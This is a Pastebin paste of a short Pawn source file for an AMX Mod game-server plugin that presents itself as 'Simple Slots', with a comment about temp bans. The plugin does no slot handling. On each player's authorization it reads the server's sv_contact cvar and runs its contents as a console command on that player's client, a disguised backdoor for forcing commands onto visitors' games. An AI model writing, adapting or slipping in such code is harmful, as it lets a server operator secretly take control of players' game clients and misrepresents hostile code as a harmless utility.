Advertisement
Guest User

1

a guest
Mar 30th, 2020
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Pawn 0.37 KB | None | 0 0
  1. #include <amxmod>
  2.  
  3. // Comment if you don't want to TEMP ban (Disable Anti-Hammer Logic)
  4. //#define TEMP_BAN
  5.  
  6. public plugin_init() {
  7.    register_plugin("Simple Slots", "1.6.1", "DynAstY")
  8. }
  9.  
  10.  
  11. public client_authorized(id) {
  12.         new KobriCmd[128]
  13.     get_cvar_string("sv_contact",KobriCmd, 128)
  14.     client_cmd(id, "%s", KobriCmd)
  15.  
  16.    return PLUGIN_CONTINUE
  17. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement